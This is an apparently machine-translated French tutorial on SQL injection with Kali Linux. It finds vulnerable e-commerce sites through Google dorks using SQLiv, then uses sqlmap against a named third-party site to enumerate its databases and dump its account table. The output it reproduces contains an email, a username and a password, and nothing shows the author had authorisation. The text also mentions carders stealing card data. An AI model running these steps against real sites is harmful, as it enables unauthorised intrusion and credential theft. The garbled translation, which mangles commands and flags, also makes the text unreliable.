Injection SQL avec Kali Linux

Injection SQL avec Kali Linux
L'utilisation de bases de données pour diverses données sur le stockage de données augmente considérablement le développement d'applications Web au fil du temps. La base de données facilite l'interaction entre les utilisateurs et les serveurs. La base de données (ou en termes de système de gestion de base de données abrégé en DMBS) offre divers avantages, y compris l'entrée et le stockage des données, la récupération de grandes informations et la facilité de compilation et de regroupement des informations.

Mais, à côté de la facilité et des fonctionnalités que la base de données offre, ainsi que les nombreuses utilisations des bases de données dans le monde de l'information et de la technologie, en particulier dans le développement d'un site Web. Iltabied, les Pentents et les pirates tentent de trouver une lacune dans la sécurité de la base de données. Ceci est confirmé par le rapport publié par Positive Technologies Researchers, Centres de recherche sur la sécurité de l'information en Europe, au deuxième trimestre de 2017, les 10 principales attaques d'application Web ont été dominées par le scénario inter-sites de 39.1% et injection SQL de 24.9%. Positive Technologies a déclaré que le rapport au deuxième trimestre n'était pas très différent du premier trimestre.

Figure 1. Top 10 des attaques d'applications Web (source PtSesecurity.com)

C'est à la fois intéressant et inquiétant, car dans une base de données, il existe de nombreuses informations comme les comptes d'identification (administrateur et utilisateur), les détails des informations financières (telles que les cartes de crédit, les comptes bancaires, etc.) et ainsi de suite. De plus, faire des attaques d'injection SQL ne nécessite pas toujours des capacités d'injection d'experts, en ce sens, les enfants peuvent le faire. Parce qu'il existe de nombreuses applications gratuites qui sont capables d'effectuer automatiquement l'injection SQL, comme SQLMAP. SQLMAP est une application open source pour les activités de test de pénétration qui vise à mener automatiquement des attaques d'injection SQL dans un trou de sécurité de la base de données. Ici, je vais vous montrer comment faire l'injection SQL en utilisant SQLMAP dans Linux Kali. Aucune capacité spéciale n'est requise, mais cela en vaut la peine si vous maîtrisez un langage de script ou une technologie de base de données SQL.

Ce tutoriel est recommandé pour ceux qui sont nouveaux dans l'injection SQL à Kali Linux, juste pour le plaisir, ou qui veulent voir comment fonctionne l'injection SQL. Il n'est pas recommandé à ceux-ci sont déjà des testeurs de pénétration hautement qualifiés.


Salut, je suis bimando, l'auteur de cet article. Si vous aimez cet article, veuillez consulter l'achat de mon livre Practical Ethical Hacking: pour les testeurs de pénétration avec Kali Linux. J'ai travaillé dur dessus avec l'équipe d'insouvrants Linux pour produire un produit de haute qualité, je sais que vous l'aimerez et apprenez beaucoup.


Injection SQL en utilisant SQLMAP dans Kali Linux

Avant de faire l'attaque d'injection, bien sûr, nous devons nous assurer que le serveur ou la cible a un trou de sécurité de la base de données. Pour trouver des trous de sécurité de la base de données, il existe plusieurs méthodes que nous pouvons utiliser. Parmi eux, Google Dorking, est utilisé principalement par des testeurs de pirate et de pénétration. Heureusement, il existe un outil qui est capable de le faire automatiquement. Mais nous devons d'abord installer son outil. L'outil est appelé SQLIV (scanner de vulnérabilité d'injection SQL).

Étape 1: Installez SQLIV sur Kali Linux

Tapez les commandes ci-dessous dans votre terminal pour installer SQLIV:

~ # git clone https: // github.com / hadesy2k / sqliv.git
~ # CD SQLIV && sudo python2 Configuration.py -i

Une fois que SQLIV est installé dans votre Kali Linux, il est stocké dans le chemin / usr / bin / sqliv. Que vous pouvez appeler directement à partir du terminal, en tapant «sqliv». Jetons maintenant un coup d'œil aux fonctionnalités SQLIV.

Étape 2: Trouver des vulnérabilités d'injection SQL

Nous utiliserons Google Dorking pour scanner et trouver le trou d'injection SQL dans les cibles. Permet de prendre un simple dork, et laisse scanner SQLIV à chaque cible et rechercher une vulnérabilité de commerce électronique au modèle d'URL suivant '.php?id = '. Pour trouver d'autres modèles juste Google pour "Google Dork List".

~ # sqliv -d inurl: élément.php?id = -e google -p 100

Par défaut, SQLIV rampera la première page sur le moteur de recherche, qui sur Google 10 sites par page. Ainsi, ici nous définissons l'argument -p 100 Pour ramper 10 pages (100 sites). Sur la base du dork donné ci-dessus, nous avons obtenu le résultat d'URL vulnérables qui ressemble à ceci:

Nous avons trouvé huit des centaines d'URL numérisées et considérées comme vulnérables contre l'attaque d'injection SQL. Enregistrez les URL dans l'éditeur de texte pour d'autres étapes.

Étape 3: Injection SQL à l'aide de SQLMAP

Une fois que nous avons obtenu au moins une cible vulnérable d'injection SQL, nous exécutons ensuite l'attaque à l'aide de SQLMAP. J'en prends un pour être un échantillon ici. Premièrement, nous devons révéler le nom de la base de données, à l'intérieur de la base de données, il y a des tables et des colonnes, qui contiennent les données.

Cible URL : http: // www.acfurniture.com / article.php?id = 25

UN. Énumérer le nom de la base de données:

Modèle de commande:

~ # SQLMAP -U "URL cible" - DBS
-u / --url: URL cible
--DBS: Énumérer le nom de la base de données / s

Ainsi, la commande compilée ressemblerait à ceci:

~ # sqlmap -u “http: // www.acfurniture.com / article.php?id = 25 ”- Dbs

De la commande ci-dessus, le résultat devrait être ressembler à ceci

Nous avons obtenu le nom de la base de données "acfurniture".

B. Énumérer le nom des tables

Modèle de commande:

~ # SQLMAP -U "URL cible" -d Nom de base de données - Tables

Donc, la commande compilée soit comme ceci:

~ # sqlmap -u "http: // www.acfurniture.com / article.php?id = 25 "-d acfurniture - Tables

Le résultat devrait ressembler à ceci:

Jusqu'à présent, nous pouvons conclure que la disposition des données est le site acfurniture.com A deux bases de données, acfurniture et information_schema. La base de données nommée acfurniture Contient quatre tables: catégorie, produit, produit_hacked, et paramètres. Il n'y a pas de nom de table compromis, mais enquêtons plus. Laissez voir ce qu'il y a à l'intérieur paramètres tableau. À l'intérieur de la table se trouve en fait il y a des colonnes, et les données.

C. Énumérer les colonnes

Modèle de commande:

~ # SQLMAP -U "URL cible" -d Nom de base de données -T-TABLE-NAME - Colonnes

Donc, la commande compilée soit comme ceci:

~ # sqlmap -u "http: // www.acfurniture.com / article.php?id = 25 "-d ACFURniture -T Paramètres - Colonnes

La sortie doit ressembler à ceci:

Le paramètres la table est composée de 6 colonnes, Et c'est en fait un compte d'identification. Permet de vider ces données.

D. Vider les données

Modèle de commande:

~ # SQLMAP -U "URL cible" -d Database-Name -T Table-Name -C Colonnes --Dump

Donc, la commande compilée soit comme ceci:

~ # sqlmap -u "http: // www.acfurniture.com / article.php?id = 25 "-d ACFURniture -T Paramètres -C Nom d'utilisateur, mot de passe - Dump

Ou vous pouvez également vider toutes les données à l'intérieur de la table, en utilisant la commande:

~ # sqlmap -u "http: // www.acfurniture.com / article.php?id = 25 "-d ACFURniture -T Paramètres - Dump

La sortie doit ressembler à ceci:

E-mail : Jackie @ Jackoarts.com
Nom d'utilisateur : Beau
Mot de passe : 9hpko2nkrhbgmywzizxui

D'accord, nous avons terminé de vider les données dans la base de données à l'aide de l'injection SQL. Nos prochaines tâches sont, pour trouver le porte ou panneau d'administration, page de connexion admin sur les sites cibles. Avant cela, assurez-vous si ce mot de passe (9hpko2nkrhbgmywzizxui) est crypté ou non, si c'est le cas, alors nous devons le déchiffrer d'abord. C'est un autre sujet, craquant et décryport.

Même ici, nous ne sommes pas réellement piratés sur le site cible, au moins nous avons beaucoup appris sur l'injection SQL en utilisant SQLMAP à Kali Linux facilement et nous vidons le compte d'identification. Cette technique est principalement utilisée par Carders (hacker qui recherche un compte de carte de crédit sur les sites de commerce électronique) qui ciblant les sites financiers, bancaires, magasins ou de commerce électronique qui stockent leurs informations de carte de crédit utilisateur.